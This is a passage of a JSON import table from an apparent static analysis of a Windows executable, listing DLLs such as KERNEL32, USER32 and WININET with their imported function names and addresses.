703. "imports": [
704. {
705. "name": "GetFileVersionInfoW",
706. "address": "0x48f76c"
707. },
708. {
709. "name": "GetFileVersionInfoSizeW",
710. "address": "0x48f770"
711. },
712. {
713. "name": "VerQueryValueW",
714. "address": "0x48f774"
715. }
716. ],
717. "dll": "VERSION.dll"
718. },
719. {
720. "imports": [
721. {
722. "name": "timeGetTime",
723. "address": "0x48f7b8"
724. },
725. {
726. "name": "waveOutSetVolume",
727. "address": "0x48f7bc"
728. },
729. {
730. "name": "mciSendStringW",
731. "address": "0x48f7c0"
732. }
733. ],
734. "dll": "WINMM.dll"
735. },
736. {
737. "imports": [
738. {
739. "name": "ImageList_ReplaceIcon",
740. "address": "0x48f088"
741. },
742. {
743. "name": "ImageList_Destroy",
744. "address": "0x48f08c"
745. },
746. {
747. "name": "ImageList_Remove",
748. "address": "0x48f090"
749. },
750. {
751. "name": "ImageList_SetDragCursorImage",
752. "address": "0x48f094"
753. },
754. {
755. "name": "ImageList_BeginDrag",
756. "address": "0x48f098"
757. },
758. {
759. "name": "ImageList_DragEnter",
760. "address": "0x48f09c"
761. },
762. {
763. "name": "ImageList_DragLeave",
764. "address": "0x48f0a0"
765. },
766. {
767. "name": "ImageList_EndDrag",
768. "address": "0x48f0a4"
769. },
770. {
771. "name": "ImageList_DragMove",
772. "address": "0x48f0a8"
773. },
774. {
775. "name": "InitCommonControlsEx",
776. "address": "0x48f0ac"
777. },
778. {
779. "name": "ImageList_Create",
780. "address": "0x48f0b0"
781. }
782. ],
783. "dll": "COMCTL32.dll"
784. },
785. {
786. "imports": [
787. {
788. "name": "WNetUseConnectionW",
789. "address": "0x48f3f8"
790. },
791. {
792. "name": "WNetCancelConnection2W",
793. "address": "0x48f3fc"
794. },
795. {
796. "name": "WNetGetConnectionW",
797. "address": "0x48f400"
798. },
799. {
800. "name": "WNetAddConnection2W",
801. "address": "0x48f404"
802. }
803. ],
804. "dll": "MPR.dll"
805. },
806. {
807. "imports": [
808. {
809. "name": "InternetQueryDataAvailable",
810. "address": "0x48f77c"
811. },
812. {
813. "name": "InternetCloseHandle",
814. "address": "0x48f780"
815. },
816. {
817. "name": "InternetOpenW",
818. "address": "0x48f784"
819. },
820. {
821. "name": "InternetSetOptionW",
822. "address": "0x48f788"
823. },
824. {
825. "name": "InternetCrackUrlW",
826. "address": "0x48f78c"
827. },
828. {
829. "name": "HttpQueryInfoW",
830. "address": "0x48f790"
831. },
832. {
833. "name": "InternetQueryOptionW",
834. "address": "0x48f794"
835. },
836. {
837. "name": "HttpOpenRequestW",
838. "address": "0x48f798"
839. },
840. {
841. "name": "HttpSendRequestW",
842. "address": "0x48f79c"
843. },
844. {
845. "name": "FtpOpenFileW",
846. "address": "0x48f7a0"
847. },
848. {
849. "name": "FtpGetFileSize",
850. "address": "0x48f7a4"
851. },
852. {
853. "name": "InternetOpenUrlW",
854. "address": "0x48f7a8"
855. },
856. {
857. "name": "InternetReadFile",
858. "address": "0x48f7ac"
859. },
860. {
861. "name": "InternetConnectW",
862. "address": "0x48f7b0"
863. }
864. ],
865. "dll": "WININET.dll"
866. },
867. {
868. "imports": [
869. {
870. "name": "GetProcessMemoryInfo",
871. "address": "0x48f484"
872. }
873. ],
874. "dll": "PSAPI.DLL"
875. },
876. {
877. "imports": [
878. {
879. "name": "IcmpCreateFile",
880. "address": "0x48f154"
881. },
882. {
883. "name": "IcmpCloseHandle",
884. "address": "0x48f158"
885. },
886. {
887. "name": "IcmpSendEcho",
888. "address": "0x48f15c"
889. }
890. ],
891. "dll": "IPHLPAPI.DLL"
892. },
893. {
894. "imports": [
895. {
896. "name": "DestroyEnvironmentBlock",
897. "address": "0x48f750"
898. },
899. {
900. "name": "UnloadUserProfile",
901. "address": "0x48f754"
902. },
903. {
904. "name": "CreateEnvironmentBlock",
905. "address": "0x48f758"
906. },
907. {
908. "name": "LoadUserProfileW",
909. "address": "0x48f75c"
910. }
911. ],
912. "dll": "USERENV.dll"
913. },
914. {
915. "imports": [
916. {
917. "name": "IsThemeActive",
918. "address": "0x48f764"
919. }
920. ],
921. "dll": "UxTheme.dll"
922. },
923. {
924. "imports": [
925. {
926. "name": "DuplicateHandle",
927. "address": "0x48f164"
928. },
929. {
930. "name": "CreateThread",
931. "address": "0x48f168"
932. },
933. {
934. "name": "WaitForSingleObject",
935. "address": "0x48f16c"
936. },
937. {
938. "name": "HeapAlloc",
939. "address": "0x48f170"
940. },
941. {
942. "name": "GetProcessHeap",
943. "address": "0x48f174"
944. },
945. {
946. "name": "HeapFree",
947. "address": "0x48f178"
948. },
949. {
950. "name": "Sleep",
951. "address": "0x48f17c"
952. },
953. {
954. "name": "GetCurrentThreadId",
955. "address": "0x48f180"
956. },
957. {
958. "name": "MultiByteToWideChar",
959. "address": "0x48f184"
960. },
961. {
962. "name": "MulDiv",
963. "address": "0x48f188"
964. },
965. {
966. "name": "GetVersionExW",
967. "address": "0x48f18c"
968. },
969. {
970. "name": "IsWow64Process",
971. "address": "0x48f190"
972. },
973. {
974. "name": "GetSystemInfo",
975. "address": "0x48f194"
976. },
977. {
978. "name": "FreeLibrary",
979. "address": "0x48f198"
980. },
981. {
982. "name": "LoadLibraryA",
983. "address": "0x48f19c"
984. },
985. {
986. "name": "GetProcAddress",
987. "address": "0x48f1a0"
988. },
989. {
990. "name": "SetErrorMode",
991. "address": "0x48f1a4"
992. },
993. {
994. "name": "GetModuleFileNameW",
995. "address": "0x48f1a8"
996. },
997. {
998. "name": "WideCharToMultiByte",
999. "address": "0x48f1ac"
1000. },
1001. {
1002. "name": "lstrcpyW",
1003. "address": "0x48f1b0"
1004. },
1005. {
1006. "name": "lstrlenW",
1007. "address": "0x48f1b4"
1008. },
1009. {
1010. "name": "GetModuleHandleW",
1011. "address": "0x48f1b8"
1012. },
1013. {
1014. "name": "QueryPerformanceCounter",
1015. "address": "0x48f1bc"
1016. },
1017. {
1018. "name": "VirtualFreeEx",
1019. "address": "0x48f1c0"
1020. },
1021. {
1022. "name": "OpenProcess",
1023. "address": "0x48f1c4"
1024. },
1025. {
1026. "name": "VirtualAllocEx",
1027. "address": "0x48f1c8"
1028. },
1029. {
1030. "name": "WriteProcessMemory",
1031. "address": "0x48f1cc"
1032. },
1033. {
1034. "name": "ReadProcessMemory",
1035. "address": "0x48f1d0"
1036. },
1037. {
1038. "name": "CreateFileW",
1039. "address": "0x48f1d4"
1040. },
1041. {
1042. "name": "SetFilePointerEx",
1043. "address": "0x48f1d8"
1044. },
1045. {
1046. "name": "SetEndOfFile",
1047. "address": "0x48f1dc"
1048. },
1049. {
1050. "name": "ReadFile",
1051. "address": "0x48f1e0"
1052. },
1053. {
1054. "name": "WriteFile",
1055. "address": "0x48f1e4"
1056. },
1057. {
1058. "name": "FlushFileBuffers",
1059. "address": "0x48f1e8"
1060. },
1061. {
1062. "name": "TerminateProcess",
1063. "address": "0x48f1ec"
1064. },
1065. {
1066. "name": "CreateToolhelp32Snapshot",
1067. "address": "0x48f1f0"
1068. },
1069. {
1070. "name": "Process32FirstW",
1071. "address": "0x48f1f4"
1072. },
1073. {
1074. "name": "Process32NextW",
1075. "address": "0x48f1f8"
1076. },
1077. {
1078. "name": "SetFileTime",
1079. "address": "0x48f1fc"
1080. },
1081. {
1082. "name": "GetFileAttributesW",
1083. "address": "0x48f200"
1084. },
1085. {
1086. "name": "FindFirstFileW",
1087. "address": "0x48f204"
1088. },
1089. {
1090. "name": "SetCurrentDirectoryW",
1091. "address": "0x48f208"
1092. },
1093. {
1094. "name": "GetLongPathNameW",
1095. "address": "0x48f20c"
1096. },
1097. {
1098. "name": "GetShortPathNameW",
1099. "address": "0x48f210"
1100. },
1101. {
1102. "name": "DeleteFileW",
1103. "address": "0x48f214"
1104. },
1105. {
1106. "name": "FindNextFileW",
1107. "address": "0x48f218"
1108. },
1109. {
1110. "name": "CopyFileExW",
1111. "address": "0x48f21c"
1112. },
1113. {
1114. "name": "MoveFileW",
1115. "address": "0x48f220"
1116. },
1117. {
1118. "name": "CreateDirectoryW",
1119. "address": "0x48f224"
1120. },
1121. {
1122. "name": "RemoveDirectoryW",
1123. "address": "0x48f228"
1124. },
1125. {
1126. "name": "SetSystemPowerState",
1127. "address": "0x48f22c"
1128. },
1129. {
1130. "name": "QueryPerformanceFrequency",
1131. "address": "0x48f230"
1132. },
1133. {
1134. "name": "FindResourceW",
1135. "address": "0x48f234"
1136. },
1137. {
1138. "name": "LoadResource",
1139. "address": "0x48f238"
1140. },
1141. {
1142. "name": "LockResource",
1143. "address": "0x48f23c"
1144. },
1145. {
1146. "name": "SizeofResource",
1147. "address": "0x48f240"
1148. },
1149. {
1150. "name": "EnumResourceNamesW",
1151. "address": "0x48f244"
1152. },
1153. {
1154. "name": "OutputDebugStringW",
1155. "address": "0x48f248"
1156. },
1157. {
1158. "name": "GetTempPathW",
1159. "address": "0x48f24c"
1160. },
1161. {
1162. "name": "GetTempFileNameW",
1163. "address": "0x48f250"
1164. },
1165. {
1166. "name": "DeviceIoControl",
1167. "address": "0x48f254"
1168. },
1169. {
1170. "name": "GetLocalTime",
1171. "address": "0x48f258"
1172. },
1173. {
1174. "name": "CompareStringW",
1175. "address": "0x48f25c"
1176. },
1177. {
1178. "name": "GetCurrentProcess",
1179. "address": "0x48f260"
1180. },
1181. {
1182. "name": "EnterCriticalSection",
1183. "address": "0x48f264"
1184. },
1185. {
1186. "name": "LeaveCriticalSection",
1187. "address": "0x48f268"
1188. },
1189. {
1190. "name": "GetStdHandle",
1191. "address": "0x48f26c"
1192. },
1193. {
1194. "name": "CreatePipe",
1195. "address": "0x48f270"
1196. },
1197. {
1198. "name": "InterlockedExchange",
1199. "address": "0x48f274"
1200. },
1201. {
1202. "name": "TerminateThread",
1203. "address": "0x48f278"
1204. },
1205. {
1206. "name": "LoadLibraryExW",
1207. "address": "0x48f27c"
1208. },
1209. {
1210. "name": "FindResourceExW",
1211. "address": "0x48f280"
1212. },
1213. {
1214. "name": "CopyFileW",
1215. "address": "0x48f284"
1216. },
1217. {
1218. "name": "VirtualFree",
1219. "address": "0x48f288"
1220. },
1221. {
1222. "name": "FormatMessageW",
1223. "address": "0x48f28c"
1224. },
1225. {
1226. "name": "GetExitCodeProcess",
1227. "address": "0x48f290"
1228. },
1229. {
1230. "name": "GetPrivateProfileStringW",
1231. "address": "0x48f294"
1232. },
1233. {
1234. "name": "WritePrivateProfileStringW",
1235. "address": "0x48f298"
1236. },
1237. {
1238. "name": "GetPrivateProfileSectionW",
1239. "address": "0x48f29c"
1240. },
1241. {
1242. "name": "WritePrivateProfileSectionW",
1243. "address": "0x48f2a0"
1244. },
1245. {
1246. "name": "GetPrivateProfileSectionNamesW",
1247. "address": "0x48f2a4"
1248. },
1249. {
1250. "name": "FileTimeToLocalFileTime",
1251. "address": "0x48f2a8"
1252. },
1253. {
1254. "name": "FileTimeToSystemTime",
1255. "address": "0x48f2ac"
1256. },
1257. {
1258. "name": "SystemTimeToFileTime",
1259. "address": "0x48f2b0"
1260. },
1261. {
1262. "name": "LocalFileTimeToFileTime",
1263. "address": "0x48f2b4"
1264. },
1265. {
1266. "name": "GetDriveTypeW",
1267. "address": "0x48f2b8"
1268. },
1269. {
1270. "name": "GetDiskFreeSpaceExW",
1271. "address": "0x48f2bc"
1272. },
1273. {
1274. "name": "GetDiskFreeSpaceW",
1275. "address": "0x48f2c0"
1276. },
1277. {
1278. "name": "GetVolumeInformationW",
1279. "address": "0x48f2c4"
1280. },
1281. {
1282. "name": "SetVolumeLabelW",
1283. "address": "0x48f2c8"
1284. },
1285. {
1286. "name": "CreateHardLinkW",
1287. "address": "0x48f2cc"
1288. },
1289. {
1290. "name": "SetFileAttributesW",
1291. "address": "0x48f2d0"
1292. },
1293. {
1294. "name": "CreateEventW",
1295. "address": "0x48f2d4"
1296. },
1297. {
1298. "name": "SetEvent",
1299. "address": "0x48f2d8"
1300. },
1301. {
1302. "name": "GetEnvironmentVariableW",
1303. "address": "0x48f2dc"
1304. },
1305. {
1306. "name": "SetEnvironmentVariableW",
1307. "address": "0x48f2e0"
1308. },
1309. {
1310. "name": "GlobalLock",
1311. "address": "0x48f2e4"
1312. },
1313. {
1314. "name": "GlobalUnlock",
1315. "address": "0x48f2e8"
1316. },
1317. {
1318. "name": "GlobalAlloc",
1319. "address": "0x48f2ec"
1320. },
1321. {
1322. "name": "GetFileSize",
1323. "address": "0x48f2f0"
1324. },
1325. {
1326. "name": "GlobalFree",
1327. "address": "0x48f2f4"
1328. },
1329. {
1330. "name": "GlobalMemoryStatusEx",
1331. "address": "0x48f2f8"
1332. },
1333. {
1334. "name": "Beep",
1335. "address": "0x48f2fc"
1336. },
1337. {
1338. "name": "GetSystemDirectoryW",
1339. "address": "0x48f300"
1340. },
1341. {
1342. "name": "HeapReAlloc",
1343. "address": "0x48f304"
1344. },
1345. {
1346. "name": "HeapSize",
1347. "address": "0x48f308"
1348. },
1349. {
1350. "name": "GetComputerNameW",
1351. "address": "0x48f30c"
1352. },
1353. {
1354. "name": "GetWindowsDirectoryW",
1355. "address": "0x48f310"
1356. },
1357. {
1358. "name": "GetCurrentProcessId",
1359. "address": "0x48f314"
1360. },
1361. {
1362. "name": "GetProcessIoCounters",
1363. "address": "0x48f318"
1364. },
1365. {
1366. "name": "CreateProcessW",
1367. "address": "0x48f31c"
1368. },
1369. {
1370. "name": "GetProcessId",
1371. "address": "0x48f320"
1372. },
1373. {
1374. "name": "SetPriorityClass",
1375. "address": "0x48f324"
1376. },
1377. {
1378. "name": "LoadLibraryW",
1379. "address": "0x48f328"
1380. },
1381. {
1382. "name": "VirtualAlloc",
1383. "address": "0x48f32c"
1384. },
1385. {
1386. "name": "IsDebuggerPresent",
1387. "address": "0x48f330"
1388. },
1389. {
1390. "name": "GetCurrentDirectoryW",
1391. "address": "0x48f334"
1392. },
1393. {
1394. "name": "lstrcmpiW",
1395. "address": "0x48f338"
1396. },
1397. {
1398. "name": "DecodePointer",
1399. "address": "0x48f33c"
1400. },
1401. {
1402. "name": "GetLastError",
1403. "address": "0x48f340"
1404. },
1405. {
1406. "name": "RaiseException",
1407. "address": "0x48f344"
1408. },
1409. {
1410. "name": "InitializeCriticalSectionAndSpinCount",
1411. "address": "0x48f348"
1412. },
1413. {
1414. "name": "DeleteCriticalSection",
1415. "address": "0x48f34c"
1416. },
1417. {
1418. "name": "InterlockedDecrement",
1419. "address": "0x48f350"
1420. },
1421. {
1422. "name": "InterlockedIncrement",
1423. "address": "0x48f354"
1424. },
1425. {
1426. "name": "GetCurrentThread",
1427. "address": "0x48f358"
1428. },
1429. {
1430. "name": "CloseHandle",
1431. "address": "0x48f35c"
1432. },
1433. {
1434. "name": "GetFullPathNameW",
1435. "address": "0x48f360"
1436. },
1437. {
1438. "name": "EncodePointer",
1439. "address": "0x48f364"
1440. },
1441. {
1442. "name": "ExitProcess",
1443. "address": "0x48f368"
1444. },
1445. {
1446. "name": "GetModuleHandleExW",
1447. "address": "0x48f36c"
1448. },
1449. {
1450. "name": "ExitThread",
1451. "address": "0x48f370"
1452. },
1453. {
1454. "name": "GetSystemTimeAsFileTime",
1455. "address": "0x48f374"
1456. },
1457. {
1458. "name": "ResumeThread",
1459. "address": "0x48f378"
1460. },
1461. {
1462. "name": "GetCommandLineW",
1463. "address": "0x48f37c"
1464. },
1465. {
1466. "name": "IsProcessorFeaturePresent",
1467. "address": "0x48f380"
1468. },
1469. {
1470. "name": "IsValidCodePage",
1471. "address": "0x48f384"
1472. },
1473. {
1474. "name": "GetACP",
1475. "address": "0x48f388"
1476. },
1477. {
1478. "name": "GetOEMCP",
1479. "address": "0x48f38c"
1480. },
1481. {
1482. "name": "GetCPInfo",
1483. "address": "0x48f390"
1484. },
1485. {
1486. "name": "SetLastError",
1487. "address": "0x48f394"
1488. },
1489. {
1490. "name": "UnhandledExceptionFilter",
1491. "address": "0x48f398"
1492. },
1493. {
1494. "name": "SetUnhandledExceptionFilter",
1495. "address": "0x48f39c"
1496. },
1497. {
1498. "name": "TlsAlloc",
1499. "address": "0x48f3a0"
1500. },
1501. {
1502. "name": "TlsGetValue",
1503. "address": "0x48f3a4"
1504. },
1505. {
1506. "name": "TlsSetValue",
1507. "address": "0x48f3a8"
1508. },
1509. {
1510. "name": "TlsFree",
1511. "address": "0x48f3ac"
1512. },
1513. {
1514. "name": "GetStartupInfoW",
1515. "address": "0x48f3b0"
1516. },
1517. {
1518. "name": "GetStringTypeW",
1519. "address": "0x48f3b4"
1520. },
1521. {
1522. "name": "SetStdHandle",
1523. "address": "0x48f3b8"
1524. },
1525. {
1526. "name": "GetFileType",
1527. "address": "0x48f3bc"
1528. },
1529. {
1530. "name": "GetConsoleCP",
1531. "address": "0x48f3c0"
1532. },
1533. {
1534. "name": "GetConsoleMode",
1535. "address": "0x48f3c4"
1536. },
1537. {
1538. "name": "RtlUnwind",
1539. "address": "0x48f3c8"
1540. },
1541. {
1542. "name": "ReadConsoleW",
1543. "address": "0x48f3cc"
1544. },
1545. {
1546. "name": "GetTimeZoneInformation",
1547. "address": "0x48f3d0"
1548. },
1549. {
1550. "name": "GetDateFormatW",
1551. "address": "0x48f3d4"
1552. },
1553. {
1554. "name": "GetTimeFormatW",
1555. "address": "0x48f3d8"
1556. },
1557. {
1558. "name": "LCMapStringW",
1559. "address": "0x48f3dc"
1560. },
1561. {
1562. "name": "GetEnvironmentStringsW",
1563. "address": "0x48f3e0"
1564. },
1565. {
1566. "name": "FreeEnvironmentStringsW",
1567. "address": "0x48f3e4"
1568. },
1569. {
1570. "name": "WriteConsoleW",
1571. "address": "0x48f3e8"
1572. },
1573. {
1574. "name": "FindClose",
1575. "address": "0x48f3ec"
1576. },
1577. {
1578. "name": "SetEnvironmentVariableA",
1579. "address": "0x48f3f0"
1580. }
1581. ],
1582. "dll": "KERNEL32.dll"
1583. },
1584. {
1585. "imports": [
1586. {
1587. "name": "AdjustWindowRectEx",
1588. "address": "0x48f4cc"
1589. },
1590. {
1591. "name": "CopyImage",
1592. "address": "0x48f4d0"
1593. },
1594. {
1595. "name": "SetWindowPos",
1596. "address": "0x48f4d4"
1597. },
1598. {
1599. "name": "GetCursorInfo",
1600. "address": "0x48f4d8"
1601. },
1602. {
1603. "name": "RegisterHotKey",
1604. "address": "0x48f4dc"
1605. },
1606. {
1607. "name": "ClientToScreen",
1608. "address": "0x48f4e0"
1609. },
1610. {
1611. "name": "GetKeyboardLayoutNameW",
1612. "address": "0x48f4e4"
1613. },
1614. {
1615. "name": "IsCharAlphaW",
1616. "address": "0x48f4e8"
1617. },
1618. {
1619. "name": "IsCharAlphaNumericW",
1620. "address": "0x48f4ec"
1621. },
1622. {
1623. "name": "IsCharLowerW",
1624. "address": "0x48f4f0"
1625. },
1626. {
1627. "name": "IsCharUpperW",
1628. "address": "0x48f4f4"
1629. },
1630. {
1631. "name": "GetMenuStringW",
1632. "address": "0x48f4f8"
1633. },
1634. {
1635. "name": "GetSubMenu",
1636. "address": "0x48f4fc"
1637. },
1638. {
1639. "name": "GetCaretPos",
1640. "address": "0x48f500"
1641. },
1642. {
1643. "name": "IsZoomed",
1644. "address": "0x48f504"
1645. },
1646. {
1647. "name": "MonitorFromPoint",
1648. "address": "0x48f508"
1649. },
1650. {
1651. "name": "GetMonitorInfoW",
1652. "address": "0x48f50c"
1653. },
1654. {
1655. "name": "SetWindowLongW",
1656. "address": "0x48f510"
1657. },
1658. {
1659. "name": "SetLayeredWindowAttributes",
1660. "address": "0x48f514"
1661. },
1662. {
1663. "name": "FlashWindow",
1664. "address": "0x48f518"
1665. },
1666. {
1667. "name": "GetClassLongW",
1668. "address": "0x48f51c"
1669. },
1670. {
1671. "name": "TranslateAcceleratorW",
1672. "address": "0x48f520"
1673. },
1674. {
1675. "name": "IsDialogMessageW",
1676. "address": "0x48f524"
1677. },
1678. {
1679. "name": "GetSysColor",
1680. "address": "0x48f528"
1681. },
1682. {
1683. "name": "InflateRect",
1684. "address": "0x48f52c"
1685. },
1686. {
1687. "name": "DrawFocusRect",
1688. "address": "0x48f530"
1689. },
1690. {
1691. "name": "DrawTextW",
1692. "address": "0x48f534"
1693. },
1694. {
1695. "name": "FrameRect",
1696. "address": "0x48f538"
1697. },
1698. {
1699. "name": "DrawFrameControl",
1700. "address": "0x48f53c"
1701. },
1702. {
1703. "name": "FillRect",
1704. "address": "0x48f540"
1705. },
1706. {
1707. "name": "PtInRect",
1708. "address": "0x48f544"
1709. },
1710. {
1711. "name": "DestroyAcceleratorTable",
1712. "address": "0x48f548"
1713. },
1714. {
1715. "name": "CreateAcceleratorTableW",
1716. "address": "0x48f54c"
1717. },
1718. {
1719. "name": "SetCursor",
1720. "address": "0x48f550"
1721. },
1722. {
1723. "name": "GetWindowDC",
1724. "address": "0x48f554"
1725. },
1726. {
1727. "name": "GetSystemMetrics",
1728. "address": "0x48f558"
1729. },
1730. {
1731. "name": "GetActiveWindow",
1732. "address": "0x48f55c"
1733. },
1734. {
1735. "name": "CharNextW",
1736. "address": "0x48f560"
1737. },
1738. {
1739. "name": "wsprintfW",
1740. "address": "0x48f564"
1741. },
1742. {
1743. "name": "RedrawWindow",
1744. "address": "0x48f568"
1745. },
1746. {
1747. "name": "DrawMenuBar",
1748. "address": "0x48f56c"
1749. },
1750. {
1751. "name": "DestroyMenu",
1752. "address": "0x48f570"
1753. },
1754. {
1755. "name": "SetMenu",
1756. "address": "0x48f574"
1757. },
1758. {
1759. "name": "GetWindowTextLengthW",
1760. "address": "0x48f578"
1761. },
1762. {
1763. "name": "CreateMenu",
1764. "address": "0x48f57c"
1765. },
1766. {
1767. "name": "IsDlgButtonChecked",
1768. "address": "0x48f580"
1769. },
1770. {
1771. "name": "DefDlgProcW",
1772. "address": "0x48f584"
1773. },
1774. {
1775. "name": "CallWindowProcW",
1776. "address": "0x48f588"
1777. },
1778. {
1779. "name": "ReleaseCapture",
1780. "address": "0x48f58c"
1781. },
1782. {
1783. "name": "SetCapture",
1784. "address": "0x48f590"
1785. },
1786. {
1787. "name": "CreateIconFromResourceEx",
1788. "address": "0x48f594"
1789. },
1790. {
1791. "name": "mouse_event",
1792. "address": "0x48f598"
1793. },
1794. {
1795. "name": "ExitWindowsEx",
1796. "address": "0x48f59c"
1797. },
1798. {
1799. "name": "SetActiveWindow",
1800. "address": "0x48f5a0"
1801. },
1802. {
1803. "name": "FindWindowExW",
1804. "address": "0x48f5a4"
1805. },
1806. {
1807. "name": "EnumThreadWindows",
1808. "address": "0x48f5a8"
1809. },
1810. {
1811. "name": "SetMenuDefaultItem",
1812. "address": "0x48f5ac"
1813. },
1814. {
1815. "name": "InsertMenuItemW",
1816. "address": "0x48f5b0"
1817. },
1818. {
1819. "name": "IsMenu",
1820. "address": "0x48f5b4"
1821. },
1822. {
1823. "name": "TrackPopupMenuEx",
1824. "address": "0x48f5b8"
1825. },
1826. {
1827. "name": "GetCursorPos",
1828. "address": "0x48f5bc"
1829. },
1830. {
1831. "name": "DeleteMenu",
1832. "address": "0x48f5c0"
1833. },
1834. {
1835. "name": "SetRect",
1836. "address": "0x48f5c4"
1837. },
1838. {
1839. "name": "GetMenuItemID",
1840. "address": "0x48f5c8"
1841. },
1842. {
1843. "name": "GetMenuItemCount",
1844. "address": "0x48f5cc"
1845. },
1846. {
1847. "name": "SetMenuItemInfoW",
1848. "address": "0x48f5d0"
1849. },
1850. {
1851. "name": "GetMenuItemInfoW",
1852. "address": "0x48f5d4"
1853. },
1854. {
1855. "name": "SetForegroundWindow",
1856. "address": "0x48f5d8"
1857. },
1858. {
1859. "name": "IsIconic",
1860. "address": "0x48f5dc"
1861. },
1862. {
1863. "name": "FindWindowW",
1864. "address": "0x48f5e0"
1865. },
1866. {
1867. "name": "MonitorFromRect",
1868. "address": "0x48f5e4"
1869. },
1870. {
1871. "name": "keybd_event",
1872. "address": "0x48f5e8"
1873. },
1874. {
1875. "name": "SendInput",
1876. "address": "0x48f5ec"
1877. },
1878. {
1879. "name": "GetAsyncKeyState",
1880. "address": "0x48f5f0"
1881. },
1882. {
1883. "name": "SetKeyboardState",
1884. "address": "0x48f5f4"
1885. },
1886. {
1887. "name": "GetKeyboardState",
1888. "address": "0x48f5f8"
1889. },
1890. {
1891. "name": "GetKeyState",
1892. "address": "0x48f5fc"
1893. },
1894. {
1895. "name": "VkKeyScanW",
1896. "address": "0x48f600"
1897. },
1898. {
1899. "name": "LoadStringW",
1900. "address": "0x48f604"
1901. },
1902. {
1903. "name": "DialogBoxParamW",
1904. "address": "0x48f608"
1905. },
1906. {
1907. "name": "MessageBeep",
1908. "address": "0x48f60c"
1909. },
1910. {
1911. "name": "EndDialog",
1912. "address": "0x48f610"
1913. },
1914. {
1915. "name": "SendDlgItemMessageW",
1916. "address": "0x48f614"
1917. },
1918. {
1919. "name": "GetDlgItem",
1920. "address": "0x48f618"
1921. },
1922. {
1923. "name": "SetWindowTextW",
1924. "address": "0x48f61c"
1925. },
1926. {
1927. "name": "CopyRect",
1928. "address": "0x48f620"
1929. },
1930. {
1931. "name": "ReleaseDC",
1932. "address": "0x48f624"
1933. },
1934. {
1935. "name": "GetDC",
1936. "address": "0x48f628"
1937. },
1938. {
1939. "name": "EndPaint",
1940. "address": "0x48f62c"
1941. },
1942. {
1943. "name": "BeginPaint",
1944. "address": "0x48f630"
1945. },
1946. {
1947. "name": "GetClientRect",
1948. "address": "0x48f634"
1949. },
1950. {
1951. "name": "GetMenu",
1952. "address": "0x48f638"
1953. },
1954. {
1955. "name": "DestroyWindow",
1956. "address": "0x48f63c"
1957. },
1958. {
1959. "name": "EnumWindows",
1960. "address": "0x48f640"
1961. },
1962. {
1963. "name": "GetDesktopWindow",
1964. "address": "0x48f644"
1965. },
1966. {
1967. "name": "IsWindow",
1968. "address": "0x48f648"
1969. },
1970. {
1971. "name": "IsWindowEnabled",
1972. "address": "0x48f64c"
1973. },
1974. {
1975. "name": "IsWindowVisible",
1976. "address": "0x48f650"
1977. },
1978. {
1979. "name": "EnableWindow",
1980. "address": "0x48f654"
1981. },
1982. {
1983. "name": "InvalidateRect",
1984. "address": "0x48f658"
1985. },
1986. {
1987. "name": "GetWindowLongW",
1988. "address": "0x48f65c"
1989. },
1990. {
1991. "name": "GetWindowThreadProcessId",
1992. "address": "0x48f660"
1993. },
1994. {
1995. "name": "AttachThreadInput",
1996. "address": "0x48f664"
1997. },
1998. {
1999. "name": "GetFocus",
2000. "address": "0x48f668"
2001. },
2002. {
2003. "name": "GetWindowTextW",
2004. "address": "0x48f66c"
2005. },
2006. {
2007. "name": "ScreenToClient",
2008. "address": "0x48f670"
2009. },
2010. {
2011. "name": "SendMessageTimeoutW",
2012. "address": "0x48f674"
2013. },
2014. {
2015. "name": "EnumChildWindows",
2016. "address": "0x48f678"
2017. },
2018. {
2019. "name": "CharUpperBuffW",
2020. "address": "0x48f67c"
2021. },
2022. {
2023. "name": "GetParent",
2024. "address": "0x48f680"
2025. },
2026. {
2027. "name": "GetDlgCtrlID",
2028. "address": "0x48f684"
2029. },
2030. {
2031. "name": "SendMessageW",
2032. "address": "0x48f688"
2033. },
2034. {
2035. "name": "MapVirtualKeyW",
2036. "address": "0x48f68c"
2037. },
2038. {
2039. "name": "PostMessageW",
2040. "address": "0x48f690"
2041. },
2042. {
2043. "name": "GetWindowRect",
2044. "address": "0x48f694"
2045. },
2046. {
2047. "name": "SetUserObjectSecurity",
2048. "address": "0x48f698"
2049. },
2050. {
2051. "name": "CloseDesktop",
2052. "address": "0x48f69c"
2053. },
2054. {
2055. "name": "CloseWindowStation",
2056. "address": "0x48f6a0"
2057. },
2058. {
2059. "name": "OpenDesktopW",
2060. "address": "0x48f6a4"
2061. },
2062. {
2063. "name": "SetProcessWindowStation",
2064. "address": "0x48f6a8"
2065. },
2066. {
2067. "name": "GetProcessWindowStation",
2068. "address": "0x48f6ac"
2069. },
2070. {
2071. "name": "OpenWindowStationW",
2072. "address": "0x48f6b0"
2073. },
2074. {
2075. "name": "GetUserObjectSecurity",
2076. "address": "0x48f6b4"
2077. },
2078. {
2079. "name": "MessageBoxW",
2080. "address": "0x48f6b8"
2081. },
2082. {
2083. "name": "DefWindowProcW",
2084. "address": "0x48f6bc"
2085. },
2086. {
2087. "name": "SetClipboardData",
2088. "address": "0x48f6c0"
2089. },
2090. {
2091. "name": "EmptyClipboard",
2092. "address": "0x48f6c4"
2093. },
2094. {
2095. "name": "CountClipboardFormats",
2096. "address": "0x48f6c8"
2097. },
2098. {
2099. "name": "CloseClipboard",
2100. "address": "0x48f6cc"
2101. },
2102. {
2103. "name": "GetClipboardData",
2104. "address": "0x48f6d0"
2105. },
2106. {
2107. "name": "IsClipboardFormatAvailable",
2108. "address": "0x48f6d4"
2109. },
2110. {
2111. "name": "OpenClipboard",
2112. "address": "0x48f6d8"
2113. },
2114. {
2115. "name": "BlockInput",
2116. "address": "0x48f6dc"
2117. },
2118. {
2119. "name": "GetMessageW",
2120. "address": "0x48f6e0"
2121. },
2122. {
2123. "name": "LockWindowUpdate",
2124. "address": "0x48f6e4"
2125. },
2126. {
2127. "name": "DispatchMessageW",
2128. "address": "0x48f6e8"
2129. },
2130. {
2131. "name": "TranslateMessage",
2132. "address": "0x48f6ec"
2133. },
2134. {
2135. "name": "PeekMessageW",
2136. "address": "0x48f6f0"
2137. },
2138. {
2139. "name": "UnregisterHotKey",
2140. "address": "0x48f6f4"
2141. },
2142. {
2143. "name": "CheckMenuRadioItem",
2144. "address": "0x48f6f8"
2145. },
2146. {
2147. "name": "CharLowerBuffW",
2148. "address": "0x48f6fc"
2149. },
2150. {
2151. "name": "MoveWindow",
2152. "address": "0x48f700"
2153. },
2154. {
2155. "name": "SetFocus",
2156. "address": "0x48f704"
2157. },
2158. {
2159. "name": "PostQuitMessage",
